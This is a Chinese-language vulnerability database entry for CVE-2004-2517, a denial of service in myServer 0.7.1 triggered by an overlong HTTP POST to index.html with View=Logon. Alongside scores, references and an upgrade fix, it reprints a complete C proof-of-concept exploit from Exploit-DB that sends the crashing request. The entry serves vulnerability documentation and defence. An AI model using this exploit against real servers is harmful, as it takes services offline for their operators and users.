CVE-2004-2517
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:21
NMCOE    

[原文]myServer 0.7.1 allows remote attackers to cause a denial of service (crash) via a long HTTP POST request in a View=Logon operation to index.html.


[CNNVD]myServer服务拒绝(崩溃)漏洞(CNNVD-200412-1035)

        myServer 0.7.1版本存在漏洞。远程攻击者借助到index.html的View=Logon操作中的超长HTTP POST请求导致服务拒绝(崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2517
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2517
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1035
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/17496
(UNKNOWN)  XF  myserver-http-post-dos(17496)
http://www.osvdb.org/10333
(UNKNOWN)  OSVDB  10333
http://securitytracker.com/id?1011427
(UNKNOWN)  SECTRACK  1011427
http://secunia.com/advisories/12640
(UNKNOWN)  SECUNIA  12640
http://fux0r.phathookups.com/advisory/sp-x14-advisory.txt
(VENDOR_ADVISORY)  MISC  http://fux0r.phathookups.com/advisory/sp-x14-advisory.txt
http://sourceforge.net/project/shownotes.php?release_id=270736
(SIGNATURE_SOURCE)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=270736

- 漏洞信息

myServer服务拒绝(崩溃)漏洞
中危 未知
2004-12-31 00:00:00 2005-11-18 00:00:00
远程  
        myServer 0.7.1版本存在漏洞。远程攻击者借助到index.html的View=Logon操作中的超长HTTP POST请求导致服务拒绝(崩溃)。

- 公告与补丁

        

- 漏洞信息 (551)

MyServer 0.7.1 (POST) Denial Of Service Exploit (EDBID:551)
linux dos
2004-09-27 Verified
0 Tom Ferris
N/A [点击下载]
/****************************/ 
PoC to crash the server 
/****************************/ 

/* MyServer 0.7.1 POST Denial Of Service 
vendor URL: 
http://www.myserverproject.net 

coded and discovered by: 
badpack3t 
for .:sp research labs:. 
www.security-protocols.com 
9.20.2004 
Tested on Mandrake 10.0 

usage: 
sp-myserv-0.7.1 [targetport] (default is 80) 
*/ 

#include <'winsock2.h> 
#include <'stdio.h> 

#pragma comment(lib, "ws2_32.lib") 

char exploit[] = 

"POST index.html?View=Logon HTTP/1.1 " 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
": ihack.ms "; 

int main(int argc, char *argv[]) 
{ 
WSADATA wsaData; 
WORD wVersionRequested; 
struct hostent *pTarget; 
struct sockaddr_in sock; 
char *target; 
int port,bufsize; 
SOCKET mysocket; 

if (argc < 2) 
{ 
printf("MyServer 0.7.1 POST DoS by badpack3t ", argv[0]); 
printf("Usage: %s [targetport] (default is 80) ", argv[0]); 
printf("www.security-protocols.com ", argv[0]); 
exit(1); 
} 

wVersionRequested = MAKEWORD(1, 1); 
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; 

target = argv[1]; 
port = 80; 

if (argc >= 3) port = atoi(argv[2]); 
bufsize = 1024; 
if (argc >= 4) bufsize = atoi(argv[3]); 

mysocket = socket(AF_INET, SOCK_STREAM, 0); 
if(mysocket==INVALID_SOCKET) 
{ 
printf("Socket error! "); 
exit(1); 
} 

printf("Resolving Hostnames... "); 
if ((pTarget = gethostbyname(target)) == NULL) 
{ 
printf("Resolve of %s failed ", argv[1]); 
exit(1); 
} 

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); 
sock.sin_family = AF_INET; 
sock.sin_port = htons((USHORT)port); 

printf("Connecting... "); 
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))) 
{ 
printf("Couldn't connect to host. "); 
exit(1); 
} 

printf("Connected!... "); 
printf("Sending Payload... "); 
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1) 
{ 
printf("Error Sending the Exploit Payload "); 
closesocket(mysocket); 
exit(1); 
} 

printf("Payload has been sent! Check if the webserver is dead! "); 
closesocket(mysocket); 
WSACleanup(); 
return 0; 
}

// milw0rm.com [2004-09-27]
		

- 漏洞信息

10333
MyServer HTTP POST Request Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

MyServer contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker sends a specially crafted overly long HTTP POST request, and will result in loss of availability for the service.

- 时间线

2004-09-23 Unknow
2004-09-23 Unknow

- 解决方案

Upgrade to version 0.7.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站